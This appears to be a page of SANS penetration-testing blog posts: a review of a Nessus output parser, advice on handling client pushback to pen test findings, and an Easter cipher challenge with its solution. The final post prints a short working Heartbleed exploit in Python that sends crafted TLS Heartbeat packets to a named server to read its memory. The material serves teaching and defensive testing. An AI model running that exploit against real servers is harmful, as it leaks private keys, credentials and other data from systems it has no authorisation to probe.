Data, Data, Everywhere – What to do with Volumes of Nessus Output

[Editor’s note: Here’s a really nice article by Kevin Fiscus on a tool that’ll help you analyze and manage a great deal of Nessus vulnerability scanner output.  This is really helpful, cool stuff!  Thanks, Kevin.  –Ed.]

By Kevin Fiscus

Doing really good, high-value penetration testing is hard. You have to start with a solid, repeatable methodology on which you build a process implemented via tools and techniques. It is a technical endeavor that is, more often than not, remarkably creative.  But, to do it well, you need to understand hacker techniques, cyber defense, protocols, packets, and even people. Sometimes, however, basic logistics get in the way. The problem, in many cases, is that the tools are simply too good, or rather, they give too much information but lack a particularly effective way for a penetration tester to use that information. Case in point: Nessus.

Nessus is a fantastic vulnerability scanner. It has the capability to perform both credentialed and uncredentialled scans of target environments, and test for tens of thousands of vulnerabilities across an enormous range of platforms. For the budget conscious among us, it is also one of the more cost effective commercial solutions on the market. Unfortunately, while superior in many ways, it is not known for its reporting capabilities. Tenable Network Security, the creators of Nessus, have additional products to provide more advance reporting capabilities, but purchasing them changes the cost structure considerably.

The problem, thus, is one of data overload from any vulnerability scanner, including Nessus. Particularly when performing internal, credentialed scans against network resources, the amount of data generated can be overwhelming. While generally presented in an easy-to-understand format, the data you’ll be given includes each vulnerability individually. Nessus has the capability to view results by IP address or by vulnerability, so identifying the most vulnerable server by vulnerability count or the most common critical severity vulnerability is fairly easy. But what if you wanted to identify the most vulnerable server in terms of the common vulnerability scoring system (CVSS), or wanted to count the number of servers with at least one high or at least one critical severity vulnerability? These things can be difficult within the Nessus interface and are more difficult when looking at Nessus output reports. Fortunately, there are answers for nifty and high-value ways to slice and dice Nessus results.

Nessus has the ability to output reports in a variety of formats, one of which is XML. This has allowed the security community to create tools to parse Nessus results and convert them into a variety of other formats. The one I tend to like can be found at http://www.melcara.com and is called, very originally, “Nessus Parser.” The current version, as of the writing of this posting, is v20a.  And, it’s free.

The Melcara Nessus Parser is a Perl program that converts Nessus XML output into a Microsoft Excel workbook. It doesn’t just create a CSV file with basic scan results, it creates an entire workbook consisting of over TWENTY tabs. A brief tour of at least a few of these tabs will help illustrate the benefits of this tool.

The “Home Worksheet” tab contains summary information about the numbers and counts of vulnerabilities and vulnerable systems as shown below:

The “CVSS Score Total” tab includes, for each IP address scanned, Common Vulnerability Scoring System results and allows you to tune the final scores by introducing a score modifier. By changing the value of a few cells, you can increase the contributing factor of a medium severity from 1 to 1.25, a high severity to 1.5 and a critical to 1.75 (or any value you want). The spreadsheet has been formatted to allow easy sorting on any column.

A series of five tabs labeled Critical, High, Medium, Low, and Informational provide counts and details for each identified vulnerability. For each tab, it lists the type of vulnerability (plugin family), the vulnerability name (plugin name), the number of instances of that vulnerability identified, a description of the vulnerability, the recommended solution, and whether there are exploits for the vulnerability included in Canvas, Metasploit, or Core Impact.  That last tidbit is really cool and helpful for penetration testers looking to move from scanning into outright exploitation of target systems.

The “Device Type” tab provides the IP address, fully qualified domain name, NetBIOS name, and device type for every tested system while the “HostConfigData” tab provides the number of vulnerabilities by severity for each IP address. This tab also provides information about minimum password length, password history length, minimum/maximum password age, complexity requirements and account lockout information if credentialed tests were run. The “portScanData” tab contains information about listening ports and services for each IP address while “InstalledSoftwareData” provides information about software identified to be installed on each target system.

The “UserAccount Data” tab provides information about user accounts found on each tested system, including where the account was found (local or Active Directory), the account name, and the SID and the type of account (e.g. Domain User, Domain Administrator, etc.). This tab also includes information about whether the password for the account has ever been changed, whether the account has been disabled, whether it has ever logged in, and information about certain group membership. Additional tabs provide information about Wireless Access Points and SSIDs detected, passed or failed compliance or policy checks, and various summary information.

Other than the “Home Worksheet”, all of the tabs are formatted to allow for filtering and sorting of the data in any column, and because the data is in Excel, the workbooks can be expanded with graphs, charts, pivot tables, etc. That’s pretty sweet.  Also, got a whole bunch of Nessus results from several scans against several target environments?  The Melcara Nessus Parser has the capability of taking multiple Nessus XML files as input, and track which file the results came from, for each row of data presented. Thus, if you wanted to scan five different locations individually, you could look at their results individually, as a whole, or any subset thereof.

Getting the Nessus Parser to run can be somewhat challenging. You, of course, need to install Perl and there are a whole set of CPAN modules that need to be installed for it to run. That said, it is my experience that the author of the tool is extremely helpful, should you run into problems. Once everything is set up, running the tool is easy and involves these steps:

Step 1: Export the results of your Nessus scans in XML (or .nessus) format
Step 2: Place all the XML files into a directory
Step 3: Execute the command “perl parse_nessus_xml.v20a.pl -d <directory>” where the directory is the location of the XML files.

The parser will look at all of the files in the selected directory, identify those that contain Nessus output, and generate an output report based on provided input. There are a couple of additional command line switches that can be used to control the output:

  • The default output file will be called “nessus_report_XXXXXXXXX” where the X’s will be replace with data and time information. If you want to change the prefix of “nessus_report” to something else, you do it with the -o option
  • If you want to run the tool against an individual file instead of a directory, you can use the -f <filename> instead of -d <directory>.
  • The -r option allows you to change the severity of individual Nessus plugins by plugin ID.

The Melcara Nessus Parser can be of tremendous value in reviewing, sorting, analyzing and working with Nessus output. As a penetration tester, the ability to identify the most vulnerable targets or to find that one obscure vulnerability is awesome. As a defensive security professional using Nessus to attempt to improve security, the ability to take the output from a scanning tool like Nessus and truly work with the output is amazing.

If you are new to vulnerability scans, Nessus and/or penetration testing in general, or if you have been doing this type of thing for a while and want to take your skills to the next level, you will definitely want to check out SANS SEC560: Network Penetration Testing and Ethical Hacking. This course not only teaches you cool hacker tools and techniques, it also provides you with an industry proven methodology that ensures your penetrations tests provide real business value.

–Kevin Fiscus
SANS Certified Instructor

UPDATE: Diligent reader Vikneswaran Kunasegaran (@SecurityBazinga) noticed that the Melcara script didn’t work on Kali Linux (and possibly some Debian systems) due to some missing dependencies.  He wrote a handy little script that automatically pulls down those dependencies and gets your system ready.  You could do what the script does manually, if you’d prefer, or just copy and paste it into a file, chmod it so that it is executable, and run it.  Thanks, Vikneswaran.  Nice work!  Here’s the script:

#!/bin/sh
#install dependencies for running nessus parser melcara.com#

#update#
sudo apt-get update

#install dependencies#
sudo cpan install XML::TreePP
sudo cpan install Data::Dumper
sudo cpan install Math::Round
sudo cpan install Excel::Writer::XLSX
sudo cpan install Data::Table
sudo cpan install Excel::Writer::XLSX::Chart

#Thank you Have Fun!#

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Dealing with the Many Stages of Pen Test Result Grief – Part 1

By Ed Skoudis

If you’ve done penetration testing for any length of time, I’m sure you’ve encountered it.  You perform a beautiful penetration test – technically rigorous, focused on real business risk, all wrapped up with a solid report.   You don’t wanna brag, but you feel pretty darned proud of completing a job well done.

And then… it happens.  Target system personnel, the very people you’ve labored to help secure, blindside you with a barrage of criticisms of your findings in your draft report.  Some penetration testers are shocked as target system personnel, both business decision makers and the technical people responsible for acting on the pen test findings, reject your results.  It’s almost as though they willfully don’t understand your findings and the associated business risk.  Your findings make perfect sense to you, yet they just don’t get it despite your efforts to explain things as best you can.  And, you still have to turn your draft report into a final report that is meaningful for the target organization.  I’ve been there, my friends, right along side you.  It can be soul crushing.

Over the years, my colleagues and I have developed our pen test methodologies and reporting techniques for avoiding and dealing with these situations.  In this series of articles, we’ll look at a variety of negative responses to penetration testing results often held by target system personnel.  Most important, we’ll discuss how to avoid these issues proactively in the way you conduct the test and report your findings so you can head them off in advance.  And, if they still come up, we’ll offer tips for how to respond to each situation so you can adjust your draft report into a really meaningful, useful final report for the organization.

In this series of articles, we’ll present each of these situations as a stage, analogous to the stages of grief people go through when they suffer a loss.  It’s important to note, however, that not every group of target personnel will move through each and every stage.  Often, people reading your report will fixate on a single stage and linger there.  Your diligence can help them move off of the given stage and onto improving their security stance.

Ultimately, that’s the bottom line – the goal of an effective penetration test is to help organizations improve their security stance in light of real-world threats and attack vectors demonstrating important business risk.  As you’ll see as this series unfolds, we’ll keep coming back to that concept.

Another important note is worth mentioning: it is entirely possible that target system personnel are 100% right about their responses to your findings.  As a pen tester, remember to keep your ego in check and actually listen carefully to target system personnel.  Yes, some of their push back is just the classic stages of grief as we’ll discuss in this series.  But, sometimes, what they tell you is actually real and well founded.  Your intelligently incorporating their responses into finalizing your report for this project and adjusting your approaches for future pen tests will make you a better penetration tester.

Oh, and one last point before we dig in.  Thankfully, whenever issues like this come up, they seldom apply to all findings.  Instead, they apply to just one or two particularly important findings in your penetration test.  Thus, it’s extremely unlikely that you’ll have to use all the techniques we describe in this series for every finding.  Instead, you should use them for your most critical and important findings, those that need action.

OK, with that background, let’s get started by jumping to the single most common reason for rejecting pen test findings: denial.

Stage 1: Denial

Your so-called “vulnerability” is not really there.  In fact, even it the situation you describe is real (which is doubtful), it’s not really a vulnerability, but instead a feature of our environment.

To proactively avoid this kind of claim, make sure your report includes, for each critical or important finding, the following items:

a)    A description of the attack steps needed to exploit the finding

b)   A description of the business risk (in business terms) associated with the finding, particularly how it could damage the organization’s mission, such as by costing it money, damaging its reputation, inviting regulatory oversight, etc.

c)    One or more screenshots showing that the finding is real.  Your screenshot should include annotation with arrows and text pointing to the proof on the screen that the vulnerability is really there.  A picture is worth a thousand words, they say.  Make your screenshot really illustrative that your finding is a problem and poses a business risk.

d)   If available, a description of how other organizations suffered from attacks against the given issue.

You don’t have to provide these items for each and every finding, but it’s vital to include them for your critical and important findings, those that you really think require attention and near-term action.

Even if you provide the items described above in your draft report, you may still face target system personnel who play the “denial” game.  If that happens, I recommend you double check the quality of each of the items in the list above, in particular, item b.  Also, make sure item a provides a realistic, step-by-step narrative of how an actual, real-world threat faced by the target organization could exploit the given situation to cause harm.

Additionally, if you still get pushback from target system personnel in the form of denial, consider a brainstorming session with them (either face to face or via conference call) to discuss different remediation recommendations.  It’s often the case that their denial hinges not on your specific finding, but instead on the operational difficulty in implementing and managing your recommended fixes.  If that’s the case, brainstorming about alternative remediation efforts that can still fix the situation while being operationally tenable can help you achieve your overall goal of improving security in a cost-effective manner.  Sometimes, you’ll have to back off on your original recommendation (not your finding, but just the recommendation) and work with target system personnel to come up with clever and artful alternatives that still mitigate the flaw.

Stage 2: We Meant to Do It That Way

We made a conscious business decision to do things this way, so your “finding” is really just underscoring our design decisions.  Thus, your work is unimportant, and we don’t have to take your so-called “discovery” into account; the concept has been baked into our plans since the start.

Ah yes.  This is a classic.  To avoid it proactively, make sure your critical findings include each of the items we discussed in our “denial” segment above.  Even so, this may still come up after you deliver your draft report.  When confronted with this kind of response, remember to maintain your cool and be supportive.  Let them know that you are happy to hear that they anticipated this situation, and that your pen test confirmed it.  I like to use phrases like, “It’s good to see we’re on the same page then” and “Excellent.  Let’s work together to come up with a good mitigation strategy that works for you.”

Then, as before, put together a step-by-step narrative showing how a real threat could exploit this issue causing business harm to the organization.  Suggest a brainstorming call for different remediation tactics.  With this response, it is more likely than ever that the organization really needs help in finding a remediation plan that they can operationalize around.  Your job as a penetration tester is to help them find a practical way to thwart the tactics you used.  I sometimes hear from pen testers this notion: “Look, I’m an offensive guy.  How the heck do I know what to do defend against this stuff?”  I find such an attitude is most often merely an excuse or a dodge, and I push back.  “You’re a very smart attacker,” I truthfully say, “and I’ll bet you could come up with half a dozen techniques that’ll thwart the tactics you used here.”  Most of the time, the penetration tester agrees.

But, even if you can’t come up with an acceptable and deployable approach yourself, in your mitigation brainstorming conference call or meeting, invite particularly clever and smart operations personnel that you’ve allied with in the target organization to help come up with solutions to your finding.  Those interactions will be like gold as you tailor your final report recommendation to provide maximum value.

In our next installment in this series, we’ll look at Stages 3 and 4 of pen test findings grief: Blame and “That’s not FAIR!

Read: Part 2 – Dealing with the Many Stages of Pen Test Result Grief

Finally, if you want to learn how to conduct a technically rigorous penetration test using an industry-proven methodology that provides real business value, you may want to check out my SANS Security 560 course Network Penetration Testing and Ethical Hacking

It really is the must-have course to amp up your skills to become a GREAT pen tester.  In addition to discussing issues like those in this series, we also perform dozens of in-depth, hands-on labs in which you’ll build great technical skills in recon, scanning, exploitation, post exploitation, and much more.  This class covers professional penetration testing end-to-end, and helps you get ready for conducting excellent pen tests.

–Ed Skoudis
SANS Institute Fellow
SANS Penetration Testing Curriculum Lead
Author and Instructor, SANS Security 560: Network Pen Testing & Ethical Hacking

Upcoming SANS Special Event – 2018 Holiday Hack Challenge

KringleCon

SANS Holiday Hack Challenge – KringleCon 2018

  • Free SANS Online Capture-the-Flag Challenge
  • Our annual gift to the entire Information Security Industry
  • Designed for novice to advanced InfoSec professionals
  • Fun for the whole family!!
  • Build and hone your skills in a fun and festive roleplaying like video game, by the makers of SANS NetWars
  • Learn more: www.kringlecon.com
  • Play previous versions from free 24/7/365: www.holidayhackchallenge.com

Player Feedback!

  • “On to level 4 of the #holidayhackchallenge. Thanks again @edskoudis / @SANSPenTest team.” – @mikehodges
  • “#SANSHolidayHack Confession – I have never used python or scapy before. I got started with both today because of this game! Yay!” – @tww2b
  • “Happiness is watching my 12 yo meet @edskoudis at the end of #SANSHolidayHack quest. Now the gnomes #ProudHackerPapa” – @dnlongen
kringle_02

Winner and Official Answer to Easter Challenge

[Hello, Challenge fans!  Last Friday, we posted a nifty holiday-themed crypto & stego challenge by Chris Andre Dale.  We offer a special thanks to Chris for creating the challenge and for letting us host it.  A whole bunch of people managed to work their way through the challenge and solve it.  But, there were two answers that were particularly noteworthy, and will receive two T-shirts each: a NetWars T-Shirt plus our SANS Pen Test Curriculum T-shirt.

Our  first-place winner, who had the entire correct answer in the shortest time, was Matt Giannetto!  He provided some great code to decipher the message and save the bunny, winning the two T-shirts.  Additionally, we’ll provide a bonus prize (of the two T-shirts) for one of the best write-ups we received, from Thomas Heffron.  His answer was so good, we’ll make it the official answer to the challenge, which follows below.

Thanks again to all who participated!  –Ed.]

SAVING THE EASTER BUNNY

By Tom Heffron

Well, how could anyone not spend a few moments for such a noble pursuit? Besides, what would I tell my kids if I didn’t even try?

So, I start by just looking around the ciphertext and noticed the next to last line starts with:

jtgi://ahe.ifglxiflnugbsya.dp/ <– Hmmm… a URL of some sort? A bit of counting characters shows that it has a similar breakdown to:
http://www.securesolutions.no/ <– which is the URL associated with our fine puzzle maker. Is he involved in this evil crime? Interesting…
 
What this does tell us is that the cipher does seem to be a character substitution cipher, but may not be a direct one-to-one replacement. This narrows down the universe of possible ciphers, but doesn’t directly reveal the algorithm. (At least, not to me) I’ll keep that in my back pocket for now…
Moving on to the intercepted audio message, I download and play it with my Linux simple audio player. A few moments of listening indicates this audio track is probably a reverse of the true recording. How can I tell? The best way I can explain this is that each word trails _in_ to a hard ending. Most spoken language begins each word with a clear emphasis at the beginning and trails out at the end of the word or syllable.
After some mad searching around my simple media player, I realize it does not have the sufficient effects to play the recording in reverse. A quick Google search for ‘linux play mp3 in reverse‘ delivers a suggestion of Audacity.
Installing that package gave me what I needed with the Effect->Reverse option. Hit play and I hear an interesting (Northern?) European voice reading words that correlate to the NATO phonetic alphabet. (explained at http://en.wikipedia.org/wiki/NATO_phonetic_alphabet) The spoken alphabet writes out to the following string of characters (with a blank space substituted for the spoken ‘break’):
dl dropboxusercontent com u 16108286 kidnappedbunny jpg
and I use some reasonable substitution to turn this into the web URL:http://dl.dropboxusercontent.com/u/16108286/kidnappedbunny.jpg
Drop this into my browser and I see an image of the notorious Con Air movie bad guy, Cyrus ‘The Virus’ Grissom, threatening our furry little friend. Call John Cusack! We must stop these villains and save Easter!
Of course, any good SANS Pen Testing Challenge worth their value would not involve an image without the need to check the exif information. Download image and run:

exiftool ./kidnappedbunny.jpg  – which gives me the following bits of interesting information:
Comment : The ciphertext is created using the famous Vigenere cipher, once considered unbreakable. The key to reveal the cleartext is a combination of the a town located at the X Y coordinates where this picture was taken, and the make of the camera.

GPS Position : 60 deg 23′ 28.54″ N, 5 deg 19′ 19.38″ E

Camera Model Name : XcanteliQ
Let’s break this down piece by piece…
Simply dropping the GPS Location into Google Maps takes us to the town of Bergen, Norway. (Aha! Our puzzle maker is looking more suspicious!)
Add ‘bergen’ to the string from the camera model and I get the key: ‘bergenxcanteliq
Now, to learn more about Vigenere Cipher, I consult Google Search again with ‘Vigenere Cipher decryption’. Trying the first listing (why not?!) gives a site that is ready to apply this key against the ciphertext. Inserting the necessary information returns the following cleartext:
——————–
congratulations! by successfully deciphering this message you could let the easter police know of the whereabouts of the easter terrorists. the criminals have successfully been apprehended, thanks to you! thanks for your good work, and i hope it was fun. here is the final part of the Easter Challenge:
did you like it? leave a comment and let me know :)
——————–
Success! I seemed to have helped save the Easter Bunny! Browsing to the link provided in the cleartext indicated from the comments that I was not the first concerned citizen to help the Easter police. I’ll assume that Mr. Bunny is safe and sound and that the challenge creator was not part of the evil plot!
Thanks to Chris Andre Dale for a fun challenge and to the SANS Pen Testing team for hosting it!
And, finally, to access the password-protected website to get the photo of the safe bunny, you’d enter in a password of the same key (with appropriate case) used to decode the cipher: BergenXcanteliQ  That would reveal the following image:
woohoo

Easter Challenge – The Mystery of the Missing Easter Bunny

By Chris Andre Dale

The Easter Bunny has been kidnapped, and YOU have to save him! Quickly collect yourself and help save him. Put on your detective hat and start investigating the clues provided.

We managed to intercept a message from the kidnappers.  Unfortunately it seems to be scrambled in some way. We also managed to intercept a ciphered message from one of the criminals and the cipher text below. The cipher text was once considered unbreakable, however newer techniques of cryptoanalysis have proven how to beat it. Listen to the intercepted message from the kidnappers, or attack the cipher message. Your choice.

The intercepted message can be played back here: http://securesolutions.no/intercepted%20and%20scrambled%20message.mp3

The cipher text looks like this:

Dsemvnqwlnmmzvi! Cc jagpbussnpwg tfgzvlroknt mlta cfwjgkr vqu phywl bfx kni Rxutrk Tztydi btsj lh tux asmhfesuygp qf gai Piiuii Zieoqrvlxd. Bxf gioqvkclf aegm ivgtkwfcwlyr fpmd btgxiubpdrw, xsidlw ku cbr! Vhngod nes cfav tlqd jhvv, ide M yutr fv wnl jfv. Xfvv ow geg fvgew xqsx fl xub Gafmic Kxbpckrtb: jtgi://ahe.ifglxiflnugbsya.dp/iryxro-ehneppvwf-xyk-qlpveer-sq-bxf-qzywvki-enlxpz-rvree/

Hva aoh emvm yu? Pvgzr x eozfiyb qoh ckx zb mnbp :)

How will you aid the investigation? Anyone with an interest in cryptanalysis might attack the cipher directly, however the rest of us, along with some Google Fu, may start with the intercepted message.

Good luck! The Easter Bunny depends on you!

The first one to email the answer to  PenTestVideo <at> sans.org (yes, that’s the email alias to our team of judges) will win a SANS Pen Test T-Shirt as well as a SANS NetWars T-Shirt!  Please use an e-mail subject of “SAVING THE EASTER BUNNY” for your e-mail at PenTestVideo <at> sans.org.

Best regards,

Chris Andre Dale
Blog: http://www.securesolutions.no
Twitter: http://twitter.com/#!/ChrisAndreDale
LinkedIn: http://no.linkedin.com/in/chrisad

SANS Python Pen Testers | Exploit Heartbleed Vulnerabilities | SEC573

Pen Testers use Python to assess HeartBleed vulnerabilities.

By Mark Baggett

Unless you’ve been living in a cave without access to the outside world, you already know that OpenSSL 1.0.1 suffers from a serious vulnerability that allows a remote attacker to extract data from the memory of a target computer.   The vulnerability was first made “public” (by varying definitions of the word “public”) on April 7th.    The events leading up to the disclosure are interesting.   If you haven’t reviewed them, the Sydney Morning Herald does a great job of outlining the events leading up to the disclosure.  Check it out here:

http://www.smh.com.au/it-pro/security-it/heartbleed-disclosure-timeline-who-knew-what-and-when-20140415-zqurk.html

So while it is clear as mud who knew about the vulnerability and when, it is very clear what happened afterwards.  A lot of people leveraged the power of Python to rapidly develop exploits that demonstrate the seriousness of the vulnerability.

The flaw was made public on April 7th.   Shortly afterward,  several tools were released.   Jared Stafford (jspenguin) wrote the first public proof of concept Python tool to exploit the vulnerability.  His tool called “SSLTEST.PY” was published here, http://s3.jspenguin.org/ssltest.py.  As I write this, that website is unavailable but several copies of his original tool are still available through pastebin.com.  http://pastebin.com/WmxzjkXJ

The exploit was quickly modified and improved by takeshix https://twitter.com/_takeshix.  His version of the tool included support for several application layer protocols that use OpenSSL, such as secure email and SFTP.   His update is called “HB-TEST.PY”   This is probably the most widely used variant of the exploit and it is available here:  https://gist.github.com/takeshixx/10107280#file-hb-test-py

Several other interesting Python penetration testing tools were also published in short order, including a scanner written by Rahul Sasi that looks for vulnerable servers called “HEARTBEAT_SCANNER.PY”  His code is available here:

https://bitbucket.org/fb1h2s/cve-2014-0160/src/bba16b3eedef0e92bd91fea496b00c92eb515e29/Heartbeat_scanner.py?at=master

Peter Wu (aka Lekensteyn) also posted a tool called “PACEMAKER.PY” that can be used to test/exploit client software.  That’s right — client software!  You have to worry about more than just those nasty web servers.  His tool is available here.

https://github.com/Lekensteyn/pacemaker

In no time at all we went from a new vulnerability disclosure all the way up to a wealth of new tools that exploit the vulnerability.  So what do “ssltest.PY”, “hb-test.PY”, “heartbeat_scanner.PY” and “pacemaker.PY” all have in common?  They are all PYTHON PROGRAMS!   Why?  Because Python in pen testing is awesome!  Python is a “rapid deployment”, “batteries included” language.  That means the core set of libraries include everything that you need to perform a wide variety of tasks, including developing exploits.  Most tools only require a few lines of code.  How simple is it to exploit this vulnerability with Python?  You can do it in 7 lines of code.  Check it out:

import socket
sh=socket.socket()
sh.connect(("54.217.122.251",443))
sh.send("16030200310100002d0302500bafbbb75ab83ef0ab9ae3f39c6315334137acfd6c181a2460dc4967c2fd960000040033c01101000000".decode('hex'))
helloresponse=sh.recv(8196)
sh.send("1803020003014000".decode('hex'))
data=sh.recv(8196)

The code is pretty straight-forward.  First, we import the socket module and create a new socket object called “sh”.  We can use this object to connect to, and interact with, a remote server.  Next we use the “sh” object to connect to a remote target by providing an IP address and a port.  In this case, I am targeting a public server that has been set up by Martin Bachmann so you can see how this vulnerability works.  The URL for his server is http://heartbleed.insign.ch.  Then we send the SSL Hello message followed by the Heartbeat message.  In this case, I am transmitting the Hello and Heartbeat packets generated by Rahul Sasi’s scanner that trigger the exploit.   Then we capture the response containing the remote machine memory into a variable called “data”.  That is it!  You’ve exploited the vulnerability and captured the response.

Here are those 7 lines of code in action:

It is simple.  Python empowers penetration testers.  If you know how to use Python, you can go very quickly from a concept to working code.  SANS  Python for Penetration Testers  course, SEC573, is designed to teach you what you need to develop these kinds of tools on your own.  The course is self-paced with no prerequisites and will meet you where you are.   Even if you don’t have any programming background, the course will have you developing your own tools in to time!  The first two days cover all of the essentials of the language.  If you already know how to code, don’t worry.  You will NOT be bored.  Since this course is self- paced, you will sharpen your existing skills as well as develop new ones, through a series of self-guided pyWars challenges.  Then you will write four new penetration testing tools ready for use in your next engagement.  Finally, you will put your new tools and skills to the test in a team based capture the flag event.  Python is awesome and the SANS Python for pen testers course is the perfect place to learn new Python skills.

–Mark Baggett
@MarkBaggett